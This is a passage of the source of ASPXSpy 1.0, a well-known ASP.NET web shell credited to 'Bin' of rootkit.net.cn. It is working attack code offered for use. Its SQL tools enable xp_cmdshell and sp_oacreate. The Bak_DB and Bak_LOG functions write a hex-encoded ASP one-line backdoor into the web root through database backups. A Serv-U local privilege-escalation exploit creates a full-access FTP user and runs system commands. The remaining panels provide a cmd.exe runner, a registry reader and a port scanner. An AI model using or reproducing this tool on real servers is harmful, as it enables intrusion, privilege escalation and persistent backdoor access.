da.Fill(datatable);
}
catch (Exception)
{
}
finally
{
CloseConnection();
}
return datatable;
}
protected void SQL_SumbitButton_Click(object sender, EventArgs e)
{
try
{
Session["Bin_Table"] = null;
Bin_DataGrid.CurrentPageIndex = 0;
Bin_DataGrid.AllowPaging = true;
if (Bin_SQLRadioButton.Checked)
{
Bin_DBmenuPanel.Visible = true;
Bin_DBinfoLabel.Visible = true;
Bin_AccPanel.Visible = false;
Bin_Scroll.Visible = false;
Bin_dirPanel.Visible = false;
OpenConnection();
DataTable ver = Bin_DataTable(@"SELECT @@VERSION");
DataTable dbs = Bin_DataTable(@"SELECT name FROM master.dbo.sysdatabases");
DataTable cdb = Bin_DataTable(@"SELECT DB_NAME()");
DataTable rol = Bin_DataTable(@"SELECT IS_SRVROLEMEMBER('sysadmin')");
DataTable owner = Bin_DataTable(@"SELECT IS_MEMBER('db_owner')");
string dbo = "";
if (owner.Rows[0][0].ToString() == "1")
{
dbo = "db_owner";
}
else
{
dbo = "public";
}
if (rol.Rows[0][0].ToString() == "1")
{
dbo = "<font color=blue>sa</font>";
}
string db_info = "";
db_info = "<i><b><font color=red>SQLversion</font> : </b></i>" + ver.Rows[0][0].ToString() + "<br><hr>";
string db_name = "";
for (int i = 0; i < dbs.Rows.Count; i++)
{
db_name += dbs.Rows[i][0].ToString().Replace(cdb.Rows[0][0].ToString(), "<font color=blue>" + cdb.Rows[0][0].ToString() + "</font>") + " | ";
}
db_info += "<i><b><font color=red>DataBase</font> : </b></i><div style=\"width:760px;word-break:break-all\">" + db_name + "<br><div><hr>";
db_info += "<i><b><font color=red>SRVROLEMEMBER</font></i></b> : " + dbo + "<hr>";
Bin_DBinfoLabel.Text = db_info;
}
if (Bin_AccRadioButton.Checked)
{
Bin_DataGrid.Visible = false;
Bin_SAexecButton.Visible = false;
Bin_Accbind();
}
}
catch (Exception E)
{
Bin_Error(E.Message);
}
}
protected void Bin_Accbind()
{
try
{
Bin_DBmenuPanel.Visible = false;
Bin_AccPanel.Visible = true;
OpenConnection();
DataTable acctable = new DataTable();
acctable = conn.GetOleDbSchemaTable(OleDbSchemaGuid.Tables, new Object[] { null, null, null, "Table" });
string accstr = "<input type=hidden name=goaction><input type=hidden name=todo>";
accstr += "Tables Count : " + acctable.Rows.Count + "<br>Please select a database : <SELECT onchange=if(this.value!='')Command('postdata',this);>";
for (int i = 0; i < acctable.Rows.Count; i++)
{
accstr += "<option value=" + acctable.Rows[i].ItemArray[2].ToString() + ">" + acctable.Rows[i].ItemArray[2].ToString() + "</option>";
}
if (Session["Bin_Table"] != null)
{
accstr += "<option SELECTED>" + Session["Bin_Table"] + "</option>";
}
accstr += "</SELECT>";
Bin_AccinfoLabel.Text = accstr;
CloseConnection();
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
}
protected void Bin_Databind()
{
try
{
Bin_SAexecButton.Visible = false;
Bin_Accbind();
Bin_Scroll.Visible = true;
if (Bin_SQLRadioButton.Checked)
{
Bin_DBmenuPanel.Visible = true;
Bin_DBinfoLabel.Visible = false;
}
Bin_DataGrid.Visible = true;
DataTable databind = Bin_DataTable(@"SELECT * FROM " + Session["Bin_Table"]);
Bin_DataGrid.DataSource = databind;
Bin_DataGrid.DataBind();
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
}
public void Bin_ExecSql(string instr)
{
try
{
OpenConnection();
comm.CommandType = CommandType.Text;
comm.CommandText = instr;
comm.ExecuteNonQuery();
}
catch (Exception e)
{
Bin_Error(e.Message);
}
}
public void Item_DataBound(object sender,DataGridItemEventArgs e)
{
for (int i = 2; i < e.Item.Cells.Count; i++)
{
e.Item.Cells[i].Text = e.Item.Cells[i].Text.Replace("<", "<").Replace(">", ">");
}
}
protected void Bin_DBPage(object sender, DataGridPageChangedEventArgs e)
{
Bin_DataGrid.CurrentPageIndex = e.NewPageIndex;
Bin_Databind();
}
public void Item_Command(object sender, DataGridCommandEventArgs e)
{
if (e.CommandName == "Cancel")
{
Bin_DataGrid.EditItemIndex = -1;
Bin_Databind();
}
}
protected void Bin_ExecButton_Click(object sender, EventArgs e)
{
try
{
Bin_Scroll.Visible = true;
Bin_DataGrid.Visible = true;
Bin_DataGrid.AllowPaging = true;
Bin_Accbind();
if (Bin_SQLRadioButton.Checked)
{
Bin_DBmenuPanel.Visible = true;
}
string sqlstr = Bin_DBstrTextBox.Text;
sqlstr = sqlstr.TrimStart().ToLower();
if (sqlstr.Substring(0, 6) == "select")
{
DataTable databind = Bin_DataTable(sqlstr);
Bin_DataGrid.DataSource = databind;
Bin_DataGrid.DataBind();
}
else
{
Bin_ExecSql(sqlstr);
Bin_Databind();
}
}
catch(Exception error)
{
Bin_Error(error.Message);
}
}
protected void Bin_BDButton_Click(object sender, EventArgs e)
{
Bin_DBinfoLabel.Visible = false;
Bin_Accbind();
Bin_DBmenuPanel.Visible = true;
Bin_DataGrid.Visible = false;
Bin_DataGrid.AllowPaging = true;
Bin_Scroll.Visible = false;
Bin_DBstrTextBox.Text = "";
Bin_SAexecButton.Visible = false;
Bin_ResLabel.Visible = false;
Bin_dirPanel.Visible = false;
}
protected void Bin_SACMDButton_Click(object sender, EventArgs e)
{
Bin_DBinfoLabel.Visible = false;
Bin_DataGrid.Visible = false;
Bin_Scroll.Visible = false;
Bin_SAexecButton.Visible = true;
Bin_Change();
Bin_ExecButton.Visible = false;
Bin_ResLabel.Visible = false;
Session["Bin_Option"] = null;
Bin_dirPanel.Visible = false;
}
public void Bin_Change()
{
Bin_ExecButton.Visible = false;
string select = "<input type=hidden name=goaction><input type=hidden name=todo><input type=hidden name=intext><select onchange=if(this.value!='')Command('changedata',this);><option>SQL Server Exec<option value=\"Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll')\">Add sp_oacreate<option value=\"Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll')\">Add xp_cmdshell<option value=\"Exec master.dbo.xp_cmdshell 'net user'\">Add xp_cmdshell<option value=\"EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;\">Add xp_cmdshell(SQL2005)<option value=\"Exec master.dbo.xp_cmdshell 'net user'\">XP_cmdshell exec<option value=\"Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^<%execute(request(char(35)))%^> > c:\\1.asp';\">SP_oamethod exec<option value=\"sp_makewebtask @outputfile='d:\\web\\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))" + "%" + ">''' \">SP_makewebtask make file";
if (Session["Bin_Option"] != null)
{
select += "<option SELECTED>" + Session["Bin_Option"] + "</option>";
}
select += "</select>";
Bin_AccinfoLabel.Text = select;
Bin_DataGrid.Visible = false;
Bin_Scroll.Visible = false;
}
protected void Bin_SAexecButton_Click(object sender, EventArgs e)
{
try
{
Bin_Change();
Bin_DBinfoLabel.Visible = false;
Bin_ExecButton.Visible = false;
Bin_Scroll.Visible = false;
Bin_DataGrid.Visible = false;
Bin_DBmenuPanel.Visible = true;
string sqlstr = Bin_DBstrTextBox.Text;
DataTable databind = Bin_DataTable(sqlstr);
string res = "";
foreach (DataRow dr in databind.Rows)
{
for (int i = 0; i < databind.Columns.Count; i++)
{
res += dr[i] + "\r";
}
}
Bin_ResLabel.Text = "<hr><div id=\"nei\"><PRE>" + res.Replace(" ", " ").Replace("<", "<").Replace(">", ">") + "</PRE></div>";
}
catch (Exception error)
{
Bin_Error(error.Message);
}
}
protected void Bin_DirButton_Click(object sender, EventArgs e)
{
Bin_dirPanel.Visible = true;
Bin_AccPanel.Visible = false;
Bin_DBinfoLabel.Visible = false;
Bin_DataGrid.Visible = false;
Bin_Scroll.Visible = false;
}
protected void Bin_listButton_Click(object sender, EventArgs e)
{
Bin_dirPanel.Visible = true;
Bin_AccPanel.Visible = false;
Bin_DBinfoLabel.Visible = false;
Bin_SqlDir();
}
public void Bin_SqlDir()
{
try
{
Bin_DataGrid.Visible = true;
Bin_Scroll.Visible = true;
Bin_DataGrid.AllowPaging = false;
string exesql = "use pubs;if exists (select * from sysobjects where id = object_id(N'[bin_dir]') and OBJECTPROPERTY(id, N'IsUserTable') = 1) drop table [bin_dir]; CREATE TABLE bin_dir(DirName VARCHAR(400), DirAtt VARCHAR(400),DirFile VARCHAR(400)) INSERT bin_dir EXEC MASTER..XP_dirtree '" + Bin_DirTextBox.Text + "',1,1;";
Bin_ExecSql(exesql);
DataTable sql_dir = Bin_DataTable("select * from bin_dir");
Bin_DataGrid.DataSource = sql_dir;
Bin_DataGrid.DataBind();
}
catch (Exception e)
{
Bin_Error(e.Message);
}
}
protected void Bin_SuButton_Click(object sender, EventArgs e)
{
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = false;
Bin_SuPanel.Visible = true;
Bin_IISPanel.Visible = false;
Bin_SuresLabel.Text = "";
Bin_LoginPanel.Visible = false;
Bin_RegPanel.Visible = false;
Bin_PortPanel.Visible = false;
}
protected void Bin_dbshellButton_Click(object sender, EventArgs e)
{
Bin_DBinfoLabel.Visible = false;
Bin_AccPanel.Visible = false;
Bin_BakDB();
}
public void Bin_BakDB()
{
string path = Bin_DirTextBox.Text.Trim();
if (path.Substring(path.Length - 1, 1) == @"\")
{
path = path + "bin.asp";
}
else
{
path = path + @"\bin.asp";
}
string sql = "if exists (select * from sysobjects where id = object_id(N'[bin_cmd]') and OBJECTPROPERTY(id, N'IsUserTable') = 1) drop table [bin_cmd];create table [bin_cmd] ([cmd] [image]);declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x62696E backup database @a to disk = @s;insert into [bin_cmd](cmd) values(0x3C256578656375746520726571756573742822422229253E);declare @b sysname,@t nvarchar(4000) select @b=db_name(),@t='" + path + "' backup database @b to disk = @t WITH DIFFERENTIAL,FORMAT;drop table [bin_cmd];";
Bin_ExecSql(sql);
Bin_SqlDir();
}
public void Bin_BakLog()
{
string path = Bin_DirTextBox.Text.Trim();
if (path.Substring(path.Length - 1, 1) == @"\")
{
path = path + "bin.asp";
}
else
{
path = path + @"\bin.asp";
}
string sql = "if exists (select * from sysobjects where id = object_id(N'[bin_cmd]') and OBJECTPROPERTY(id, N'IsUserTable') = 1) drop table [bin_cmd];create table [bin_cmd] ([cmd] [image]);declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x62696E backup log @a to disk = @s;insert into [bin_cmd](cmd) values(0x3C256578656375746520726571756573742822422229253E);declare @b sysname,@t nvarchar(4000) select @b=db_name(),@t='" + path + "' backup log @b to disk=@t with init,no_truncate;drop table [bin_cmd];";
Bin_ExecSql(sql);
Bin_SqlDir();
}
protected void Bin_LogshellButton_Click(object sender, EventArgs e)
{
Bin_DBinfoLabel.Visible = false;
Bin_AccPanel.Visible = false;
Bin_BakLog();
}
protected void Bin_SuexpButton_Click(object sender, EventArgs e)
{
string Result = "";
string user = Bin_SunameTextBox.Text;
string pass = Bin_SupassTextBox.Text;
int port = Int32.Parse(Bin_SuportTextBox.Text);
string cmd = Bin_SucmdTextBox.Text;
string loginuser = "user " + user + "\r\n";
string loginpass = "pass " + pass + "\r\n";
string site = "SITE MAINTENANCE\r\n";
string deldomain = "-DELETEDOMAIN\r\n-IP=0.0.0.0\r\n PortNo=52521\r\n";
string setdomain = "-SETDOMAIN\r\n-Domain=BIN|0.0.0.0|52521|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n";
string newdomain = "-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin\r\n-Password=binftp\r\n-HomeDir=c:\\\r\n-LoginMesFile=\r\n-Disable=0\r\n-RelPaths=1\r\n-NeedSecure=0\r\n-HideHidden=0\r\n-AlwaysAllowLogin=0\r\n-ChangePassword=0\r\n-QuotaEnable=0\r\n-MaxUsersLoginPerIP=-1\r\n-SpeedLimitUp=0\r\n-SpeedLimitDown=0\r\n-MaxNrUsers=-1\r\n-IdleTimeOut=600\r\n-SessionTimeOut=-1\r\n-Expire=0\r\n-RatioDown=1\r\n-RatiosCredit=0\r\n-QuotaCurrent=0\r\n-QuotaMaximum=0\r\n-Maintenance=System\r\n-PasswordType=Regular\r\n-Ratios=NoneRN\r\n Access=c:\\|RWAMELCDP\r\n";
string quite = "QUIT\r\n";
try
{
TcpClient tcp = new TcpClient("127.0.0.1", port);
tcp.ReceiveBufferSize = 1024;
NetworkStream NS = tcp.GetStream();
Result = Rev(NS);
Result += Send(NS, loginuser);
Result += Rev(NS);
Result += Send(NS, loginpass);
Result += Rev(NS);
Result += Send(NS, site);
Result += Rev(NS);
Result += Send(NS, deldomain);
Result += Rev(NS);
Result += Send(NS, setdomain);
Result += Rev(NS);
Result += Send(NS, newdomain);
Result += Rev(NS);
TcpClient tcp1 = new TcpClient("127.0.0.1", 52521);
NetworkStream NS1 = tcp1.GetStream();
Result += Rev(NS1);
Result += Send(NS1, "user bin\r\n");
Result += Rev(NS1);
Result += Send(NS1, "pass binftp\r\n");
Result += Rev(NS1);
Result += Send(NS1, "site exec " + cmd + "\r\n");
Result += Rev(NS1);
tcp1.Close();
Result += Send(NS, deldomain);
Result += Rev(NS);
Result += Send(NS, quite);
Result += Rev(NS);
tcp.Close();
}
catch (Exception error)
{
Bin_Error(error.Message);
}
Bin_SuresLabel.Text = "<div id=\"su\"><pre>" + Result + "</pre></div>";
}
protected string Rev(NetworkStream instream)
{
string Restr = "";
if (instream.CanRead)
{
byte[] buffer = new byte[1024];
instream.Read(buffer, 0, buffer.Length);
Restr = Encoding.ASCII.GetString(buffer);
}
return "<font color = red>" + Restr + "</font><br>";
}
protected string Send(NetworkStream instream,string Sendstr)
{
if (instream.CanWrite)
{
byte[] buffer = Encoding.ASCII.GetBytes(Sendstr);
instream.Write(buffer, 0, buffer.Length);
}
return "<font color = blue>" + Sendstr + "</font><br>";
}
protected void Bin_IISButton_Click(object sender, EventArgs e)
{
Bin_LoginPanel.Visible = false;
Bin_MainPanel.Visible = false;
Bin_MenuPanel.Visible = true;
Bin_FilePanel.Visible = false;
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = false;
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = true;
Bin_RegPanel.Visible = false;
Bin_PortPanel.Visible = false;
Bin_iisLabel.Text = Bin_iisinfo();
}
protected void Bin_PortButton_Click(object sender, EventArgs e)
{
Bin_MenuPanel.Visible = true;
Bin_LoginPanel.Visible = false;
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = false;
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = false;
Bin_RegPanel.Visible = false;
Bin_PortPanel.Visible = true;
Bin_ScanresLabel.Text = "";
}
protected void Bin_RegButton_Click(object sender, EventArgs e)
{
Bin_MenuPanel.Visible = true;
Bin_LoginPanel.Visible = false;
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = false;
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = false;
Bin_RegPanel.Visible = true;
Bin_PortPanel.Visible = false;
Bin_RegresLabel.Text = "";
}
protected void Bin_RegreadButton_Click(object sender, EventArgs e)
{
try
{
string regkey = Bin_KeyTextBox.Text;
string subkey = regkey.Substring(regkey.IndexOf("\\") + 1, regkey.Length - regkey.IndexOf("\\") - 1);
RegistryKey rk = null;
if (regkey.Substring(0, regkey.IndexOf("\\")) == "HKEY_LOCAL_MACHINE")
{
rk = Registry.LocalMachine.OpenSubKey(subkey);
}
if (regkey.Substring(0, regkey.IndexOf("\\")) == "HKEY_CLASSES_ROOT")
{
rk = Registry.ClassesRoot.OpenSubKey(subkey);
}
if (regkey.Substring(0, regkey.IndexOf("\\")) == "HKEY_CURRENT_USER")
{
rk = Registry.CurrentUser.OpenSubKey(subkey);
}
if (regkey.Substring(0, regkey.IndexOf("\\")) == "HKEY_USERS")
{
rk = Registry.Users.OpenSubKey(subkey);
}
if (regkey.Substring(0, regkey.IndexOf("\\")) == "HKEY_CURRENT_CONFIG")
{
rk = Registry.CurrentConfig.OpenSubKey(subkey);
}
Bin_RegresLabel.Text = "<br>Result : " + rk.GetValue(Bin_ValueTextBox.Text, "NULL").ToString();
}
catch (Exception error)
{
Bin_Error(error.Message);
}
}
protected void Bin_ScancmdButton_Click(object sender, EventArgs e)
{
try
{
string res = "";
string[] port = Bin_PortsTextBox.Text.Split(',');
for (int i = 0; i < port.Length; i++)
{
res += Bin_Scan(Bin_ScanipTextBox.Text, Int32.Parse(port[i])) + "<br>";
}
Bin_ScanresLabel.Text = "<hr>" + res;
}
catch (Exception error)
{
Bin_Error(error.Message);
}
}
protected string Bin_Scan(string ip, int port)
{
string scanres = "";
TcpClient tcp = new TcpClient();
tcp.SendTimeout = tcp.ReceiveTimeout = 2000;
try
{
tcp.Connect(ip, port);
tcp.Close();
scanres = ip + " : " + port + " ................................. <font color=green><b>Open</b></font>";
}
catch (SocketException e)
{
scanres = ip + " : " + port + " ................................. <font color=red><b>Close</b></font>";
}
return scanres;
}
</script>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head runat="server">
<title>ASPXSpy1.0 -> Bin:)</title>
<style type="text/css">
A:link {
COLOR:#000000; TEXT-DECORATION:None
}
A:visited {
COLOR:#000000; TEXT-DECORATION:None
}
A:active {
COLOR:#000000; TEXT-DECORATION:None
}
A:hover {
COLOR:#000000; TEXT-DECORATION:underline
}
BODY {
FONT-SIZE: 9pt;
FONT-FAMILY: "Courier New";
}
#nei {
width:500px;
margin:0px auto;
overflow:hidden
}
#su {
width:300px;
margin:0px auto;
overflow:hidden
}
#cmd {
width:500px;
margin:0px auto;
overflow:hidden
}
</style>
<script type="text/javascript" language="javascript" >
function Command(cmd, str)
{
var strTmp = str;
var frm = document.forms[0];
if(cmd == 'del')
{
if(confirm('Del It ?'))
{
frm.todo.value = str;
frm.goaction.value = cmd;
frm.submit();
}
else return;
}
if (cmd == 'change')
{
frm.todo.value = str;
frm.goaction.value = cmd;
frm.submit();
}
if (cmd == 'down')
{
frm.todo.value = str;
frm.goaction.value = cmd;
frm.submit();
}
if (cmd == 'showatt')
{
frm.todo.value = str;
frm.goaction.value = cmd;
frm.submit();
}
if (cmd == 'edit')
{
frm.todo.value = str;
frm.goaction.value = cmd;
frm.submit();
}
if (cmd == 'deldir')
{
if(confirm('Del It ?'))
{
frm.todo.value = str;
frm.goaction.value = cmd;
frm.submit();
}
else return;
}
if(cmd == 'rename' )
{
frm.goaction.value = cmd;
frm.todo.value = str + ',';
str = prompt('Please input new filename:', strTmp);
if(str && (strTmp != str))
{
frm.todo.value += str;
frm.submit();
}
else return;
}
if(cmd == 'renamedir' )
{
frm.goaction.value = cmd;
frm.todo.value = str + ',';
str = prompt('Please input new foldername:', strTmp);
if(str && (strTmp != str))
{
frm.todo.value += str;
frm.submit();
}
else return;
}
if (cmd == 'postdata')
{
frm.todo.value = str.value;
frm.goaction.value = cmd;
frm.submit();
}
if (cmd == 'changedata')
{
frm.todo.value = str.value;
frm.intext.value = str.options[str.selectedIndex].innerText
frm.goaction.value = cmd;
frm.submit();
}
}
</script>
</head>
<body>
<form id="form1" runat="server"><div style="text-align: center"><asp:Panel ID="Bin_LoginPanel" runat="server" Height="47px" Width="401px">
<asp:Label ID="PassLabel" runat="server" Text="Password:"></asp:Label>
<asp:TextBox ID="passtext" runat="server" TextMode="Password" Width="203px"></asp:TextBox>
<asp:Button ID="LoginButton" runat="server" Text="Enter" OnClick="LoginButton_Click" /><p />
Copyright (C) 2008 Bin -> <a href="http://www.rootkit.net.cn" target="_blank">WwW.RoOTkIt.NeT.Cn</a></asp:Panel><asp:Panel ID="Bin_MenuPanel" runat="server" Height="56px" Width="771px">
<asp:Label ID="TimeLabel" runat="server" Text="Label" Width="150px"></asp:Label><br />
<asp:Button ID="MainButton" runat="server" OnClick="MainButton_Click" Text="Sysinfo" />
<asp:Button ID="Bin_IISButton" runat="server" OnClick="Bin_IISButton_Click" Text="IISSpy" />
<asp:Button ID="FileButton" runat="server" OnClick="FileButton_Click" Text="WebShell" />
<asp:Button ID="Bin_CmdButton" runat="server" Text="Command" OnClick="Bin_CmdButton_Click" />
<asp:Button ID="Bin_SQLButton" runat="server" OnClick="Bin_SQLButton_Click" Text="SqlTools" /> <asp:Button
ID="Bin_SuButton" runat="server" OnClick="Bin_SuButton_Click" Text="SuExp" />
<asp:Button ID="Bin_PortButton" runat="server" Text="PortScan" OnClick="Bin_PortButton_Click" />
<asp:Button ID="Bin_RegButton" runat="server" Text="RegShell" OnClick="Bin_RegButton_Click" />
<asp:Button ID="LogoutButton" runat="server" OnClick="LogoutButton_Click" Text="Logout" /><br />
<asp:Label ID="Bin_ErrorLabel" runat="server" EnableViewState="False">Copyright (C) 2008 Bin -> <a href="http://www.rootkit.net.cn" target="_blank">WwW.RoOTkIt.NeT.Cn</a> -> <a href="http://www.rootkit.net.cn/index.aspx" target="_blank">Reverse-IP</a> </asp:Label></asp:Panel>
<asp:Panel ID="Bin_MainPanel" runat="server" Width="769px" EnableViewState="False" Visible="False" Height="20px">
<div style="text-align: left"><asp:Label ID="InfoLabel" runat="server" Width="765px" EnableViewState="False" ></asp:Label></div></asp:Panel><div style="text-align: center">
<asp:Panel ID="Bin_FilePanel" runat="server" Width="767px" EnableViewState="False" Visible="False"><div style="text-align: left"><asp:Label ID="Bin_FileLabel" runat="server" Text="Label" Width="764px"></asp:Label><br />
<asp:Label ID="Bin_UpfileLabel" runat="server" Text="Upfile : "></asp:Label>
<input class="TextBox" id="Bin_UpFile" type="file" name="upfile" runat="server" /> <asp:TextBox ID="Bin_upTextBox" runat="server" Width="339px"></asp:TextBox>
<asp:Button ID="Bin_GoButton" runat="server" OnClick="Bin_GoButton_Click" Text="GO" />
<asp:Button ID="Bin_upButton" runat="server" Text="UpLoad" OnClick="Bin_upButton_Click" EnableViewState="False" /><br />
<asp:Label ID="Bin_CreateLabel" runat="server" Text="Create :"></asp:Label>
<asp:TextBox ID="Bin_CreateTextBox" runat="server"></asp:TextBox><asp:Button ID="Bin_NewFileButton"
runat="server" Text="NewFile" OnClick="Bin_NewFileButton_Click" />
<asp:Button ID="Bin_NewdirButton" runat="server" Text="NewDir" OnClick="Bin_NewdirButton_Click" />
<br />
<asp:Label ID="Bin_CopyLabel" runat="server" Text="Copy :" Width="39px"></asp:Label>
<asp:TextBox ID="Bin_CopyTextBox" runat="server" Width="273px"></asp:TextBox>
<asp:Label ID="Bin_CopytoLable" runat="server" Text="To:"></asp:Label>
<asp:TextBox ID="Bin_CopytoTextBox" runat="server" Width="268px"></asp:TextBox>
<asp:Button ID="Bin_CopyButton" runat="server" Text="Copy" OnClick="Bin_CopyButton_Click" />
<asp:Button ID="Bin_CutButton" runat="server" Text="Cut" Width="46px" OnClick="Bin_CutButton_Click" />
<asp:Label ID="Bin_FilelistLabel" runat="server" EnableViewState="False"></asp:Label></div><div style="text-align: center">
<asp:Panel ID="Bin_AttPanel" runat="server" Width="765px" Visible="False"><hr />
FileName :
<asp:Label ID="Bin_AttLabel" runat="server" Text="Label"></asp:Label><br />
<asp:CheckBox ID="Bin_ReadOnlyCheckBox" runat="server" Text="ReadOnly" />
<asp:CheckBox ID="Bin_SystemCheckBox" runat="server" Text="System" />
<asp:CheckBox ID="Bin_HiddenCheckBox" runat="server" Text="Hidden" />
<asp:CheckBox ID="Bin_ArchiveCheckBox" runat="server" Text="Archive" />
<br />
CreationTime :
<asp:TextBox ID="Bin_CreationTimeTextBox" runat="server" Width="123px"></asp:TextBox>
LastWriteTime :
<asp:TextBox ID="Bin_LastWriteTimeTextBox" runat="server" Width="129px"></asp:TextBox>
LastAccessTime :
<asp:TextBox ID="Bin_AccessTimeTextBox" runat="server" Width="119px"></asp:TextBox><br />
<asp:Button ID="Bin_SetButton" runat="server" OnClick="Bin_SetButton_Click" Text="Set" />
<asp:Button ID="Bin_SbackButton" runat="server" OnClick="Bin_SbackButton_Click" Text="Back" />
<hr />
</asp:Panel></div>
<div style="text-align: center"><asp:Panel ID="Bin_EditPanel" runat="server" Visible="False"><hr style="width: 757px" />
Path:<asp:TextBox ID="Bin_EditpathTextBox" runat="server" Width="455px"></asp:TextBox><br />
<asp:TextBox ID="Bin_EditTextBox" runat="server" TextMode="MultiLine" Columns="100" Rows="25" Width="760px"></asp:TextBox><br />
<asp:Button ID="Bin_EditButton" runat="server" Text="Sumbit" OnClick="Bin_EditButton_Click" /> <asp:Button
ID="Bin_BackButton" runat="server" OnClick="Bin_BackButton_Click" Text="Back" /></asp:Panel></div></asp:Panel></div>
<asp:Panel ID="Bin_CmdPanel" runat="server" Height="50px" Width="763px"><hr />
CmdPath : <asp:TextBox ID="Bin_CmdPathTextBox" runat="server" Width="395px">C:\Windows\System32\Cmd.exe</asp:TextBox><br />
Argument :
<asp:TextBox ID="Bin_CmdShellTextBox" runat="server" Width="395px">/c Set</asp:TextBox><br />
<asp:Button ID="Bin_RunButton" runat="server" OnClick="Bin_RunButton_Click" Text="Run" />
<div style="text-align: left">
<asp:Label ID="Bin_CmdLabel" runat="server" EnableViewState="False"></asp:Label></div>
<hr /></asp:Panel>
<asp:Panel ID="Bin_SQLPanel" runat="server" Visible="False" Width="763px">
<hr />
ConnString :
<asp:TextBox ID="Bin_SQLconnTextBox" runat="server" Width="547px">server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB</asp:TextBox><br />
<asp:RadioButton ID="Bin_SQLRadioButton" runat="server" AutoPostBack="True" OnCheckedChanged="Bin_SQLRadioButton_CheckedChanged" Text="MS-SQL" Checked="True" />
<asp:RadioButton ID="Bin_AccRadioButton" runat="server" AutoPostBack="True" OnCheckedChanged="Bin_AccRadioButton_CheckedChanged" Text="MS-Access" />
<asp:Button ID="SQL_SumbitButton" runat="server" Text="Sumbit" OnClick="SQL_SumbitButton_Click" /><hr />
<asp:Panel ID="Bin_DBmenuPanel" runat="server" Width="759px" Visible="False">
<asp:Button ID="Bin_BDButton" runat="server" Text="DataBase" OnClick="Bin_BDButton_Click" />
<asp:Button ID="Bin_SACMDButton" runat="server" Text="SA_Exec" OnClick="Bin_SACMDButton_Click" />
<asp:Button ID="Bin_DirButton" runat="server" Text="SQL_Dir" OnClick="Bin_DirButton_Click" /><br /><hr /><div style="text-align: left">
<asp:Label ID="Bin_DBinfoLabel" runat="server" Text="Label" EnableViewState="False"></asp:Label></div></asp:Panel>
<asp:Panel ID="Bin_AccPanel" runat="server" Height="50px" Width="759px" EnableViewState="False">
<asp:Label ID="Bin_AccinfoLabel" runat="server" Text="Label" EnableViewState="False"></asp:Label><br />
<asp:TextBox ID="Bin_DBstrTextBox" runat="server" TextMode="MultiLine" Width="569px"></asp:TextBox>
<asp:Button ID="Bin_ExecButton" runat="server" OnClick="Bin_ExecButton_Click" Text="Exec" />
<asp:Button ID="Bin_SAexecButton" runat="server" Text="SA_Exec" OnClick="Bin_SAexecButton_Click" /><br />
<div style="text-align:left">
<asp:Label ID="Bin_ResLabel" runat="server" ></asp:Label></div></asp:Panel>
<asp:Panel ID="Bin_dirPanel" runat="server" Visible="False" Width="759px">
Path :
<asp:TextBox ID="Bin_DirTextBox" runat="server" Width="447px">c:\</asp:TextBox>
<br />
<asp:Button ID="Bin_listButton" runat="server" OnClick="Bin_listButton_Click" Text="Dir" /> <asp:Button
ID="Bin_dbshellButton" runat="server" OnClick="Bin_dbshellButton_Click" Text="Bak_DB" />
<asp:Button ID="Bin_LogshellButton" runat="server" Text="Bak_LOG" OnClick="Bin_LogshellButton_Click" /><hr /></asp:Panel>
<br /><br />
<div style="overflow:scroll; text-align:left; width:770px;" id="Bin_Scroll" runat="server" visible="false" >
<asp:DataGrid ID="Bin_DataGrid" runat="server" Width="753px" PageSize="20" CssClass="Bin_DataGrid" OnItemDataBound="Item_DataBound" AllowPaging="True" OnPageIndexChanged="Bin_DBPage" OnItemCommand="Item_Command">
<PagerStyle Mode="NumericPages" Position="TopAndBottom" />
</asp:DataGrid></div>
</asp:Panel>
<asp:Panel ID="Bin_SuPanel" runat="server" Width="763px" >
<hr />
Name :
<asp:TextBox ID="Bin_SunameTextBox" runat="server">localadministrator</asp:TextBox>
Pass :
<asp:TextBox ID="Bin_SupassTextBox" runat="server">#l@$ak#.lk;0@P</asp:TextBox>
Port :
<asp:TextBox ID="Bin_SuportTextBox" runat="server">43958</asp:TextBox><br />
CMD :
<asp:TextBox ID="Bin_SucmdTextBox" runat="server" Width="447px">cmd.exe /c net user</asp:TextBox><br />
<asp:Button ID="Bin_SuexpButton" runat="server" Text="Exploit" OnClick="Bin_SuexpButton_Click" /><br />
<div style="text-align:left">
<hr />
<asp:Label ID="Bin_SuresLabel" runat="server"></asp:Label>
</div>
</asp:Panel>
<asp:Panel ID="Bin_IISPanel" runat="server" Width="763px"><div style="text-align:left">
<hr />
<asp:Label ID="Bin_iisLabel" runat="server" Text="Label" EnableViewState="False"></asp:Label> </div></asp:Panel>
<asp:Panel ID="Bin_RegPanel" runat="server" Width="763px"><hr /><div style="text-align:left">
KEY : <asp:TextBox ID="Bin_KeyTextBox" runat="server" Width="595px">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName</asp:TextBox><br />
VALUE :
<asp:TextBox ID="Bin_ValueTextBox" runat="server" Width="312px">ComputerName</asp:TextBox> <asp:Button
ID="Bin_RegreadButton" runat="server" Text="Read" OnClick="Bin_RegreadButton_Click" /><br />
<asp:Label ID="Bin_RegresLabel" runat="server"></asp:Label><hr /></div></asp:Panel>
<asp:Panel ID="Bin_PortPanel" runat="server" Width="763px">
<hr /><div style="text-align:left">
IP :
<asp:TextBox ID="Bin_ScanipTextBox" runat="server" Width="194px">127.0.0.1</asp:TextBox>
PORT :
